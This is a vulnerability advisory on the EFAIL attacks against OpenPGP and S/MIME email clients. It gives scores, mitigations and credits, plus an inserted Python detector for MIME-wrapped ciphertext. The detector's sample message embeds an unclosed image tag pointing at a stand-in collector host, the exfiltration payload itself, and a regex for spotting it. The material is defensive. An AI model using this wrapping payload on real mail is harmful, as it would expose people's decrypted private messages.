CVSS3: 5.9 Medium
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N

EPSS: 0.008 Low
Percentile: 82.0%
Mail clients may leak plaintext messages while decrypting OpenPGP and S/MIME messages.
Email clients supporting the OpenPGP or S/MIME standards may be vulnerable to a CBC/CFB gadget attack, which may allow an attacker to inject content into an encrypted email that establishes an exfiltration channel when the message is decrypted by the victim's email client. For example, an attacker could inject an HTML image tag which, when rendered by the email client, sends the plaintext as part of an HTTP request.
CVE-2017-17688: OpenPGP CFB Attacks
CVE-2017-17689: S/MIME CBC Attacks
Additionally, some email clients do not isolate multiple MIME parts, which allows attackers to wrap an encrypted message in plaintext MIME parts. When the message is decrypted and rendered by the email client, the result is an HTML-based back-channel, eliminating the need to perform the gadget attacks.
Additional details can be found in the paper describing the attacks.
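A gateway-side check for the MIME-wrapping case described above, added here as an illustrative example (it is not from CERT/CC or the paper): it flags messages in which an encrypted part is a sibling of cleartext HTML parts, and records whether an earlier HTML part leaves a URL attribute's quote open. The function names, the sample message and the `example.invalid` host are constructed for this example.

```python
import re
from email import message_from_string

# Content types that carry OpenPGP or S/MIME ciphertext.
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted", "multipart/encrypted"}
# A URL-bearing HTML attribute whose opening quote is never closed in this part,
# so content rendered after it would be absorbed into the URL.
OPEN_URL_ATTR = re.compile(
    r"""\b(?:src|href|background)\s*=\s*(["'])\s*(?:https?:)?//(?:(?!\1).)*\Z""",
    re.I | re.S)

def text_of(part):
    """Decoded body of a leaf MIME part as text."""
    return (part.get_payload(decode=True) or b"").decode("utf-8", "replace")

def is_encrypted(part):
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return (part.get_content_maintype() == "text"
            and "-----BEGIN PGP MESSAGE-----" in text_of(part))

def find_wrapped_ciphertext(raw):
    """Flag multipart containers where ciphertext sits beside cleartext HTML."""
    findings = []
    for node in message_from_string(raw).walk():
        if not node.is_multipart() or node.get_content_type() == "multipart/encrypted":
            continue  # leaf parts and well-formed PGP/MIME containers
        kids = node.get_payload()
        enc = [i for i, k in enumerate(kids) if is_encrypted(k)]
        html = [i for i, k in enumerate(kids)
                if k.get_content_type() == "text/html" and not is_encrypted(k)]
        if enc and html:
            dangling = any(i < enc[0] and OPEN_URL_ATTR.search(text_of(kids[i]))
                           for i in html)
            findings.append({"container": node.get_content_type(),
                             "encrypted_part": enc[0], "html_parts": html,
                             "open_url_attribute": dangling})
    return findings

# Constructed sample: an S/MIME part wrapped between two cleartext HTML parts.
SAMPLE = ('Content-Type: multipart/mixed; boundary="B"\n\n'
          '--B\nContent-Type: text/html\n\n<img src="http://collector.example.invalid/\n'
          '--B\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n\n'
          'CONSTRUCTED-PLACEHOLDER\n'
          '--B\nContent-Type: text/html\n\n">\n--B--\n')

if __name__ == "__main__":
    print(find_wrapped_ciphertext(SAMPLE))
```

A finding with `open_url_attribute` set to `False` is still worth review, since a legitimate encrypted message is normally the whole body rather than one sibling among cleartext HTML parts.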
A remote attacker could recover plaintext from encrypted emails without access to the encryption keys.
The CERT/CC is currently unaware of a practical solution to this problem. However, there are some mitigations that may be taken:
Decrypt mail outside of mail client
Using a separate application outside of your mail client to decrypt incoming emails prevents exfiltration channels from being opened by the email client.
Disable HTML rendering
Preventing your email client from rendering HTML will prevent the predominant form of establishing exfiltration channels.
Disable Remote Content Loading
Preventing your email client from loading remote content without permission can also help against the predominant form of establishing exfiltration channels.
122919
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 15, 2018
Affected
We have not received a statement from the vendor.
<https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html>
Group | Score | Vector |
---|---|---|
Base | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- |
Temporal | 0 | E:ND/RL:ND/RC:ND |
Environmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND |
Credit is attributed to Damian Poddebniak, Christian Dresen, Jens Muller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jorg Schwenk.
This document was written by Trent Novelly.
CVE IDs: | [CVE-2017-17688](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-17688>), CVE-2017-17689 |
---|---|
Date Public: | 2018-05-14 |
Date First Published: | |